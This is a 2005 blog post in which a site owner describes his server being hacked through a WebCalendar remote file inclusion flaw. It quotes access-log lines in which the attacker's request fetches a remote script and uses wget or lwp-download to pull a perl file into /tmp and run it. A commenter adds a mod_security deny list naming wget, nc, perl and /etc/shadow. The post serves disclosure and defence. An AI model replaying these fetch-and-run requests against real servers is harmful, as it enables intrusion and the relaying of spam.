Login Main site Create account

27.10.2005 10:51

tuxx-home.at got hacked again


This time the problem was caused by a security bug in the webcalendar application of one virtual host on this site (fazerforum.motorradseiten.at).

Someone sent some commands like this to my server that allowed him to download some perl scripts etc. to /tmp and execute them (No, /tmp is not executable, he or she called the perl interpreter directly to run this scripts).
vhosts/fazerforum.motorradseiten.at/access.log.0:201.32.151.217 - - [26/Oct/2005:13:20:54 +0200] \
    "GET /webcalendar//tools/send_reminders.php?includedir=\
    http://freewebbe.supereva.it/asc.txt?&cmd=cd%20/tmp;wget%20\
    http://alexaraojo.sites.uol.com.br/dc.txt
vhosts/fazerforum.motorradseiten.at/access.log.0:201.45.100.130 - - [27/Oct/2005:06:29:06 +0200] \
    "GET /webcalendar//tools/send_reminders.php?includedir=\
    http://freewebbe.supereva.it/asc.txt?&cmd=cd%20/tmp;lwp-download%20\
    http://www.tutoworld.org/xpl/dc.txt;perl%20dc.txt%20216.22.25.95%2017832
These scripts tried to send several thousands of emails through my server and therefore I had to deactivate the fazerforum until it is fixed.

More news later on, when I finally get rid of this issue.

Update:
After searching through the web, I found the security issue on the webcalendar project page and a discussion about this issue here.

It seems, that this issue is quite easy to fix, so I'll fix it now.
If you're using webcalendar, I strongly encourage you to apply the fix or update to 1.0.1!
Comments added earlier to http://tuxx-home.at/archives/2005/10/27/T10_51_29/index.html:
Andrew Okhmat on 2005-11-05 01:32:37 wrote:
simply setup mod_security with follwing rules:

<IfModule mod_security.c>
# Only inspect dynamic requests
SecFilterEngine On

# Some sane defaults
SecFilterScanPOST On
SecFilterCheckURLEncoding On
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecAuditEngine RelevantOnly
SecAuditLog logs/audit_log

# Reject requests with status 400
SecFilterDefaultAction &quot;deny,log,status:400&quot;


# Accept almost all byte values
SecFilterForceByteRange 0 255

# Prevent path traversal (..) attacks
SecFilter &quot;\.\./&quot;

# WEB-ATTACKS ps command attempt
SecFilterSelective THE_REQUEST &quot;/bin/ps&quot;

# WEB-ATTACKS /bin/ps command attempt
SecFilterSelective THE_REQUEST &quot;ps\x20&quot;

# WEB-ATTACKS wget command attempt
SecFilter &quot;wget\x20&quot;

# WEB-ATTACKS uname -a command attempt
SecFilter &quot;uname\x20-a&quot;

# WEB-ATTACKS /usr/bin/id command attempt
SecFilter &quot;/usr/bin/id&quot;

# WEB-ATTACKS echo command attempt
SecFilter &quot;/bin/echo&quot;

# WEB-ATTACKS kill command attempt
SecFilter &quot;/bin/kill&quot;

# WEB-ATTACKS chmod command attempt
SecFilter &quot;/bin/chmod&quot;

# WEB-ATTACKS chgrp command attempt
SecFilter &quot;/chgrp&quot;

# WEB-ATTACKS chown command attempt
SecFilter &quot;/chown&quot;

# WEB-ATTACKS chsh command attempt
SecFilter &quot;/usr/bin/chsh&quot;

# WEB-ATTACKS tftp command attempt
SecFilter &quot;tftp\x20&quot;

# WEB-ATTACKS /usr/bin/gcc command attempt
SecFilter &quot;/usr/bin/gcc&quot;

# WEB-ATTACKS gcc command attempt
SecFilter &quot;gcc\x20-o&quot;

# WEB-ATTACKS /usr/bin/cc command attempt
SecFilter &quot;/usr/bin/cc&quot;

# WEB-ATTACKS cc command attempt
SecFilter &quot;cc\x20&quot;

# WEB-ATTACKS /usr/bin/cpp command attempt
SecFilter &quot;/usr/bin/cpp&quot;

# WEB-ATTACKS cpp command attempt
SecFilter &quot;cpp\x20&quot;

# WEB-ATTACKS /usr/bin/g++ command attempt
SecFilter &quot;/usr/bin/g\+\+&quot;

# WEB-ATTACKS g++ command attempt
SecFilter &quot;g\+\+\x20&quot;

# WEB-ATTACKS bin/python access attempt
SecFilter &quot;bin/python&quot;

# WEB-ATTACKS python access attempt
SecFilter &quot;python\x20&quot;

# WEB-ATTACKS bin/tclsh execution attempt
SecFilter &quot;bin/tclsh&quot;

# WEB-ATTACKS tclsh execution attempt
SecFilter &quot;tclsh8\x20&quot;

# WEB-ATTACKS bin/nasm command attempt
SecFilter &quot;bin/nasm&quot;

# WEB-ATTACKS nasm command attempt
SecFilter &quot;nasm\x20&quot;

# WEB-ATTACKS /usr/bin/perl execution attempt
SecFilter &quot;/usr/bin/perl&quot;

# WEB-ATTACKS perl execution attempt
SecFilter &quot;perl\x20&quot;

# WEB-ATTACKS nt admin addition attempt
SecFilter &quot;net localgroup administrators /add&quot;

# WEB-ATTACKS traceroute command attempt
SecFilter &quot;traceroute\x20&quot;

# WEB-ATTACKS ping command attempt
SecFilter &quot;/bin/ping&quot;

# WEB-ATTACKS netcat command attempt
SecFilter &quot;nc\x20&quot;

# WEB-ATTACKS nmap command attempt
SecFilter &quot;nmap\x20&quot;

# WEB-ATTACKS xterm command attempt
SecFilter &quot;/usr/X11R6/bin/xterm&quot;

# WEB-ATTACKS X application to remote host attempt
SecFilter &quot;\x20-display\x20&quot;

# WEB-ATTACKS lsof command attempt
SecFilter &quot;lsof\x20&quot;

# WEB-ATTACKS rm command attempt
SecFilter &quot;rm\x20&quot;

# WEB-ATTACKS mail command attempt
SecFilter &quot;/bin/mail&quot;

# WEB-ATTACKS mail command attempt
SecFilter &quot;mail\x20&quot;

# WEB-ATTACKS /bin/ls command attempt
SecFilterSelective THE_REQUEST &quot;/bin/ls&quot;

# WEB-ATTACKS /etc/inetd.conf access
SecFilter &quot;/etc/inetd\.conf&quot;

# WEB-ATTACKS /etc/motd access
SecFilter &quot;/etc/motd&quot;

# WEB-ATTACKS /etc/shadow access
SecFilter &quot;/etc/shadow&quot;
SecFilter &quot;/etc/passwd&quot;

# WEB-ATTACKS conf/httpd.conf attempt
SecFilter &quot;conf/httpd\.conf&quot;

# WEB-ATTACKS .htgroup access
SecFilterSelective THE_REQUEST &quot;\.htgroup&quot;

# Weaker XSS protection but allows common HTML tags
SecFilter &quot;<[[:space:]]*script&quot;

# Prevent XSS atacks (HTML/Javascript injection)
SecFilter &quot;<.+>&quot;

# Very crude filters to prevent SQL injection attacks
SecFilter &quot;delete[[:space:]]+from&quot;
SecFilter &quot;insert[[:space:]]+into&quot;
SecFilter &quot;select.+from&quot;
SecFilter &quot;update.+set&quot;

# Require HTTP_USER_AGENT and HTTP_HOST headers
SecFilterSelective &quot;HTTP_USER_AGENT|HTTP_HOST&quot; &quot;^$&quot;

# Only accept request encodings we know how to handle
# we exclude GET requests from this because some (automated)
# clients supply &quot;text/html&quot; as Content-Type
# SecFilterSelective REQUEST_METHOD &quot;!^GET$&quot; chain
# SecFilterSelective HTTP_Content-Type &quot;!(^$|^application/x-www-form-urlencoded$|^multipart/form-data)&quot;

# Require Content-Length to be provided with
# every POST request
# SecFilterSelective REQUEST_METHOD &quot;^POST$&quot; chain
# SecFilterSelective HTTP_Content-Length &quot;^$&quot;

# Don't accept transfer encodings we know we don't handle
# (and you don't need it anyway)
# SecFilterSelective HTTP_Transfer-Encoding &quot;!^$&quot;

</IfModule>
Alexander Griesser on 2005-11-06 00:05:00 wrote:
Ah, thats nice to know.
I'll give that a try as fast as possible!

Thanks for the hint,
regards,
alex

Your comment (HTML tags will be stripped !!):

To verify You are not a bot, type down text from this image.

Your try: